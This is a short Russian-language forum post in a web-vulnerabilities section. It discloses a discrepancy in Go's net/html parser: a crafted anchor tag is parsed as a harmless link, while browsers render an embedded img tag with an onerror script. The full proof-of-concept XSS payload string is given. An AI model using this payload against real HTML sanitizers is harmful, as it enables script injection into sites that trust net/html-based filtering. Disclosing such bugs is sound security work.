Загрузка...

Обход фильтрации тегов в golang

Тема в разделе Веб уязвимости создана пользователем PowerDevil 13 фев 2024. 205 просмотров

Загрузка...

Кому понравилось (2) Скопировать BBCode

PowerDevil Автор темы 13 фев 2024 12 076 27 авг 2022
обход фильтрации тегов в golang.
Для строки
⁡<a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>
⁡golang net/html увидит следующий DOM

html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>

Код

html head body a ->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>

То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег
⁡<img>
⁡ и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.
13 фев 2024

2

Вы должны войти или зарегистрироваться, чтобы ответить.

Top